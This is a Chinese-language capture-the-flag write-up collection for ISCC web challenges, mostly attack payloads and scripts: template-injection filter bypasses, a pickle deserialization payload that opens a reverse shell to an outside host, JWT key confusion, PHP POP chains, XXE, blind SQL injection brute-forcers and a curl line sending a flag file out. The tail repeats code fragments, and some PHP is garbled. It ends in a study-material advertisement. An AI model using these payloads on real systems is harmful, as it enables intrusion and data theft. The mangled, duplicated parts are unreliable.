1.输入flag
发现fllaaag.txt
2.网络响应发现服务端为WSGI
猜测有模板注入
3.测试过滤内容
{{}}不能用
使用{%print()%}
4.输入{%print(config)%}查看配置
5.构造payload
(1)+.*_ class base globals等一大部分都被过滤了
(2)~可以充当连接,使用"“[”"]代替.__
(3){%print(“”[“\x5f\x5fcla”“ss\x5f\x5f”][“\x5F\x5Fba”“se\x5F\x5F”]“\x5F\x5Fsubcla”~“sses\x5F\x5F”[233][“\x5F\x5Fin”“it\x5F\x5F”][“\x5F\x5Fglo”“bals\x5F\x5F”][“\x5F\x5Fbuil”~“tins\x5F\x5F”]“eval”[“popen”](“cat flllaag\x2etxt|bas”~“e64”)“read”)%}
其中"“[”\x5f\x5fcla"~“ss\x5f\x5f”]=>“”[“__class__”]=>.__class__
web ISCC内部零元购-2.txt
方法一(非预期漏洞)
1.发现cookie里面是python反序列化
2.发现过滤了大部分内容,不过R指令没有过滤
3.手搓opcode(Vxxxx\nitimeit\ntimeit\nR.
4.xxxx即为替换执行代码,替换为__import__(‘os’).system(‘bash -c “bash -i >& /dev/tcp/zua.tpddns.cn/1234 0<&1 2>&1”’)
并且unicode编码即为
\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f\u0028\u0027\u006f\u0073\u0027\u0029\u002e\u0073\u0079\u0073\u0074\u0065\u006d\u0028\u0027\u0062\u0061\u0073\u0068\u0020\u002d\u0063\u0020\u0022\u0062\u0061\u0073\u0068\u0020\u002d\u0069\u0020\u003e\u0026\u0020\u002f\u0064\u0065\u0076\u002f\u0074\u0063\u0070\u002f\u007a\u0075\u0061\u002e\u0074\u0070\u0064\u0064\u006e\u0073\u002e\u0063\u006e\u002f\u0031\u0032\u0033\u0034\u0020\u0030\u003c\u0026\u0031\u0020\u0032\u003e\u0026\u0031\u0022\u0027\u0029
5.最终payload=b’‘’(V\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f\u0028\u0027\u006f\u0073\u0027\u0029\u002e\u0073\u0079\u0073\u0074\u0065\u006d\u0028\u0027\u0062\u0061\u0073\u0068\u0020\u002d\u0063\u0020\u0022\u0062\u0061\u0073\u0068\u0020\u002d\u0069\u0020\u003e\u0026\u0020\u002f\u0064\u0065\u0076\u002f\u0074\u0063\u0070\u002f\u007a\u0075\u0061\u002e\u0074\u0070\u0064\u0064\u006e\u0073\u002e\u0063\u006e\u002f\u0031\u0032\u0033\u0034\u0020\u0030\u003c\u0026\u0031\u0020\u0032\u003e\u0026\u0031\u0022\u0027\u0029\nitimeit\ntimeit\nR.‘’’
pickle.loads(payload)
测试通过
6.base64编码KFZcdTAwNWZcdTAwNWZcdTAwNjlcdTAwNmRcdTAwNzBcdTAwNmZcdTAwNzJcdTAwNzRcdTAwNWZcdTAwNWZcdTAwMjhcdTAwMjdcdTAwNmZcdTAwNzNcdTAwMjdcdTAwMjlcdTAwMmVcdTAwNzNcdTAwNzlcdTAwNzNcdTAwNzRcdTAwNjVcdTAwNmRcdTAwMjhcdTAwMjdcdTAwNjJcdTAwNjFcdTAwNzNcdTAwNjhcdTAwMjBcdTAwMmRcdTAwNjNcdTAwMjBcdTAwMjJcdTAwNjJcdTAwNjFcdTAwNzNcdTAwNjhcdTAwMjBcdTAwMmRcdTAwNjlcdTAwMjBcdTAwM2VcdTAwMjZcdTAwMjBcdTAwMmZcdTAwNjRcdTAwNjVcdTAwNzZcdTAwMmZcdTAwNzRcdTAwNjNcdTAwNzBcdTAwMmZcdTAwN2FcdTAwNzVcdTAwNjFcdTAwMmVcdTAwNzRcdTAwNzBcdTAwNjRcdTAwNjRcdTAwNmVcdTAwNzNcdTAwMmVcdTAwNjNcdTAwNmVcdTAwMmZcdTAwMzFcdTAwMzJcdTAwMzNcdTAwMzRcdTAwMjBcdTAwMzBcdTAwM2NcdTAwMjZcdTAwMzFcdTAwMjBcdTAwMzJcdTAwM2VcdTAwMjZcdTAwMzFcdTAwMjJcdTAwMjdcdTAwMjkKaXRpbWVpdAp0aW1laXQKUi4
替换cookie的session值即可反弹shell
cat flag.txt获取flag
方法二(预期解题思路)
SSTI模板注入
1.下载公钥文件
2.修改RS256为HS256,密钥混淆
import jwt
PUBLIC_KEY = open(‘key.txt’).read()
payload = {
“name”: “{{cycler.__init__.__globals__.os.popen(‘cat flag.txt’).read()}}”,
“exp”: 9902085613, #失效时间,随便写就好
}
header = {
“Access_IP”:“10.15.6.211”,
“alg”: “HS256”,
“typ”: “JWT”,
}
encoded = jwt.encode(payload, PUBLIC_KEY, algorithm=‘HS256’, headers=header)
print(encoded)
3.替换cookie中Auth值,并访问inner(内部商店)获取flag
#inner为第一题的内网地址
http://47.94.14.162:10009/iywqejdbcxnbamolxz238sdk
web ISCC单身节抽奖.txt
1.注册账号发现html源代码里面有一串base64编码
解码发现是PHP反序列化
2.密码设置为######“;s:4:“sdog”;i:1;s:8:“username”;s:8:”#";}0
可以替换sdog的变量,是该用户成为单身狗
3.下载存根,跳转loadzk1myHJ0vaEoT5U0j6xDOVLBw693g83S.php,发现有checktime限制时间
4.尝试后发现科学计数法可以绕过,0.5e5
5.然后可以下载网站文件,尝试下载index.php,发现被加密了
6.跑字典,下载一个apidemo.php
<?php
// 一期未完工部分:xml查询接口apiR554CvL027POp0agxkQ1bBMXnH6Ad1rz.php
// <?xml
// version=“1.0” encoding=“utf-8”
// ?>
//
// rocker
// singledog
// 4090Ti
?>
7.发现是一个xxe注入漏洞
8.payload
<?xml version="1.0" encoding="utf-8"?> <!ENTITY xxe SYSTEM "file:///flag" >]>&xxe;web ISCC疯狂购物节-1.txt
1.寻找美羊羊的base64编码 576O576K576K
import requests
import time
import os
url=“http://47.94.14.162:10001/more/get?page_number=”
headers={
‘Cookie’: ‘csrftoken=62jDmpFZNKoZOWg44yHc0wOYDIWM2Ha9xiiPpV5PuNcvmJEqBJqorQczHSr7oP7M; sessionid=riu577im8sbtirvkfq9415ov91te7h6z’
,
‘User-Agent’: ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.76’
,
‘Accept’: ‘text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9’
,
‘Accept-Encoding’: ‘gzip, deflate’
,
‘Accept-Language’: ‘zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6’
,
‘Cache-Control’: ‘max-age=0’
,
‘Connection’: ‘keep-alive’
,
‘Host’: ‘47.94.14.162:10001’
,
‘Referer’: ‘http:///47.94.14.162:10001/index/’
,
‘Upgrade-Insecure-Requests’: ‘1’
}
i=0
while i<126:
i+=1
try:
res=requests.get(url+str(i),headers=headers)
except:
pass
print(i,len(res.text))
#too fast
if len(res.text)==11:
time.sleep(0.5)
print(res.text)
if “576O576K576K” in res.text:
print(res.text)
if len(res.text)<1000:
i-=1
else:
#保存到文件方便查看
f=open(‘./1/’+str(i)+‘.txt’,‘w’)
f.write(res.text)
f.close
2.发现fl4g,尝试该字段
import requests
import string
from time import sleep
# 绕过 are you kidding me
cookies ={
‘csrftoken’:
‘Xx1QgCADdjAnhYNOnuV4on7hReuXXfaJ5dPy00n16ZRpegQzpy8XXHSvram7rO31’,
‘sessionid’: “q7kcs19owhq5nf42cln72dckwocgx3kd”,
}
headers = {
‘Acept’:‘text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7’,
‘Accept-Language’ : ‘zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6’,
‘Cache-Control’: ‘max-age=0’,
‘Connection’: ‘keep-alive’,
‘Upgrade-Insecure-Requests’ : ‘1’,
‘User-Agent’ : ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36’,
}
def str_to_hex(string):
result = ‘’
for i in string:
result+=hex(ord(i))[2:]
return result
# 正则过滤了,只能 0x+四个字符
url = “http://47.94.14.162:10001/Details/search?id=4875610)||fl4g like binary 0x25{}{}25 %23”
alphabet=“0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$&()*+,-./:;<=>?@[]^`{|}~”
result= ‘ISCC{’
for i in range(1,100):
for ch in alphabet:
payload = url.format(str_to_hex(result[-1]),str_to_hex(ch))
print(payload)
r = requests.get(url=payload,cookies=cookies,headers=headers)
sleep(1.3)
if “too fast” in r.text:
print(“too fast”)
sleep(2)
r = requests.get(url=payload,cookies=cookies,headers=headers)
if"576O576K576K" in r.text:
print(payload)
result += ch
print(“Success:”, result)
break
爆完即可得到flag
web Where_is_your_love.txt
1.js解码发现3个文件
加密的letter.php,pem公钥,php反序列化
2.构造poc链
读取phpinfo
http://47.94.14.162:10003/LoveStory.php?iscc=O:3:%22boy%22:1:{s:4:%22like%22;O:4:%22girl%22:1:{s:7:%22boyname%22;O:6:%22helper%22:2:{s:4:%22name%22;O:3:%22boy%22:1:{s:4:%22like%22;O:6:%22helper%22:2:{s:4:%22name%22;N;s:6:%22string%22;a:1:{s:6:%22string%22;s:7:%22phpinfo%22;}}};s:6:%22string%22;s:4:%226666%22;}}}
发现"love_story::love"无法设置this变量
使用 a = a r r a y ( " s t r i n g " = > [ a = array("string" => [ a=array("string"=>[l, “love”]);
class boy
{
public $like;
public function __destruct()
{
echo "能请你喝杯奶茶吗?
";
@$this->like->make_friends();
}
public function __toString()
{
echo "拱火大法好
";
return $this->like->string;
}
}
class girl
{
private $boyname;
public function __construct($a)
{
$this->boyname = $a;
}
public function __call($func, $args)
{
echo "我害羞羞
";
isset($this->boyname->name);
}
}
class helper
{
private $name; #{“string”:“love_story::love”}
private $string;
public function __construct($a, $string)
{
if ($a === 1) {
$this->name = array(‘string’ => ‘(new love_story())->love’);
var_dump($this->name);
var_dump($this->name[‘string’]);
} else {
$this->name = $a;
}
$this->string = $string;
}
public function __isset($val)
{
echo "僚机上线
";
echo $this->name;
}
public function __get($name)
{
echo "僚机不懈努力
";
$var = t h i s − > this-> this−>name;
var_dump($var);
var_dump( v a r [ var[ var[name]);
v a r [ var[ var[name](); #(new love_story())->love()
}
}
class love_story
{
public $fall_in_love = array(“girl_and_boy”);
public function __construct()
{
echo “construct nihao”;
}
public function love()
{
echo "爱情萌芽
";
array_walk( t h i s , f u n c t i o n ( this, function ( this,function(make, $colo) {
echo "坠入爱河,给你爱的密码
";
if ($make[0] === “girl_and_boy” && $colo === “fall_in_love”) {
global $flag;
echo $flag;
echo “good”;
}
});
}
}
getcwd();
$b1 = new boy();
$b2 = new boy();
h 1 = n e w h e l p e r ( h1 = new helper( h1=newhelper(b2, “222”);
g = n e w g i r l ( g = new girl( g=newgirl(h1);
#$a[“string”] = “love_story::love”;
$l = new love_story();
a = a r r a y ( " s t r i n g " = > [ a = array("string" => [ a=array("string"=>[l, “love”]);
$h2 = new helper(1, $a);
$b2->like = $h2;
$b1->like = $g;
echo urlencode(serialize($b1));
获取到e3e6121b3e253c591ce407333a5e5a04272a58e7175a0b34060a5b28375e270809e13e3e3404
3.写python解密rsa
从解密网站分解n得到p,q
from Crypto.Util.number import bytes_to_long, long_to_bytes
from Crypto.PublicKey import RSA
import codecs
with open(“keyiscc.pem”, “rb”) as f:
key = RSA.import_key(f.read())
print(f"n = {key.n}")
print(f"e = {key.e}")
n = 21632595061498942456591176284485458726074437255982049051386399661866343401307576418742779935973203520468696897782308820580710694887656859447653301575912839865540207043886422473424543631000613842175006881377927881354616669050512971265340129939652367389539089568185762381769176974757484155591541925924309034566325122477217195694622210444478497422147703839359963069352123250114163369656862332886519324535078617986837018261033100555378934126290111146362437878180948892817526628614714852292454750429061910217210651682864700027396878086089765753730027466491890569705897416499997534143482201450410155650707746775053846974603
e = 65537
p = 147080233415299360057845495186390765586922902910770748924042642102066002833475419563625282038534033761523277282491713393841245804046571337610325158434942879464810055753965320619327164976752647165681046903418924945132096866002693037715397450918689064404951199247250188795306045444756953833882242163199922206967
q = 147080233415299360057845495186390765586922902910770748924042475419563625282038534033761523277282491713393841245804046571337610325158434942879464810055753965320619327164976752647165681046903418924945132096866002693037715397450918689064404951199247250188795306045444756953833882242163199922205709
with open(‘letter.php’, ‘rb’) as f:
c = f.read()
c = int.from_bytes(c, byteorder=‘big’)
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
print(long_to_bytes(int(m)))
flag = ‘e3243907335e1c191b5a3705093a5f24582f185f11293b251f082614043e5be516e13e3e3404’
flag1 = ‘’
for i in range(0, len(flag), 2):
cc = int(flag[i:i+2], 16)
b = cc ^ 100
a = chr(b - 10)
flag1 += a
print(codecs.decode(flag1[::-1], ‘rot13’))
解密即可获取flag
web上大号说话.txt
1.输入马保国
发现.git
python反序列化
2.发现cookie加密了
from cryptography.fernet import Fernet
import base64
import threading
def crypto(base_str):
return cipher_suite.encrypt(base_str)
def generate_key(key:str):
key_byte = key.encode()
#print(key_byte)
return base64.urlsafe_b64encode(key_byte + b’0’ * 28)
def decode(t):
try:
print(cipher_suite.decrypt(t))
print(“------------”+all+“-------------------”)
except:
pass
num=0
all=‘’
for i in ‘5’:
for j in ‘abcdefghijklmnopqrstuvwsyzABCDEFGHIJKLMNOPQRSTUVWSYZ1234567890’:
for k in ‘abcdefghijklmnopqrstuvwsyzABCDEFGHIJKLMNOPQRSTUVWSYZ1234567890’:
for z in ‘abcdefghijklmnopqrstuvwsyzABCDEFGHIJKLMNOPQRSTUVWSYZ1234567890’:
#print(decode(b"gAAAAABkUlGoGqwzRa8bVl98SSXNJzKP6ArP4LeFzrM2GlaIVD9Dc8QDPa8SihQrgETZDpF3N3C3q86XEJaC-SvxeiBn5LJJTnvF3t_xYIS0KSDHniSXyS7gay2NeuXnSaKwcMCzRxzBL61b8Q3rPxGs_6b3qp_HY9wUQqbDmZpZ2WHlpFvBt6U="))
all=i+j+k+z
num+=1
if num%10000==0:
print(all)
cipher_suite=Fernet(generate_key(all))
decode(b"gAAAAABkUlGoGqwzRa8bVl98SSXNJzKP6ArP4LeFzrM2GlaIVD9Dc8QDPa8SihQrgETZDpF3N3C3q86XEJaC-SvxeiBn5LJJTnvF3t_xYIS0KSDHniSXyS7gay2NeuXnSaKwcMCzRxzBL61b8Q3rPxGs_6b3qp_HY9wUQqbDmZpZ2WHlpFvBt6U=")
解密为5MbG
3.发现没有回显
使用公网ip监听
curl zua.tpddns.cn:1234/cat flagucjbgaxqef.txt|base64
尝试R指令被过滤
4.指令构造
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
FvBt6U="))
all=i+j+k+z
num+=1
if num%10000==0:
print(all)
cipher_suite=Fernet(generate_key(all))
decode(b"gAAAAABkUlGoGqwzRa8bVl98SSXNJzKP6ArP4LeFzrM2GlaIVD9Dc8QDPa8SihQrgETZDpF3N3C3q86XEJaC-SvxeiBn5LJJTnvF3t_xYIS0KSDHniSXyS7gay2NeuXnSaKwcMCzRxzBL61b8Q3rPxGs_6b3qp_HY9wUQqbDmZpZ2WHlpFvBt6U=")
解密为5MbG
3.发现没有回显
使用公网ip监听
curl zua.tpddns.cn:1234/cat flagucjbgaxqef.txt|base64
尝试R指令被过滤
4.指令构造
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
[外链图片转存中…(img-wT3O2gm7-1715490897371)]
[外链图片转存中…(img-8K5PaWbw-1715490897372)]
[外链图片转存中…(img-ZCdhIW9Q-1715490897372)]
[外链图片转存中…(img-ZwenjkHS-1715490897373)]
[外链图片转存中…(img-qLw7jwPE-1715490897373)]
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!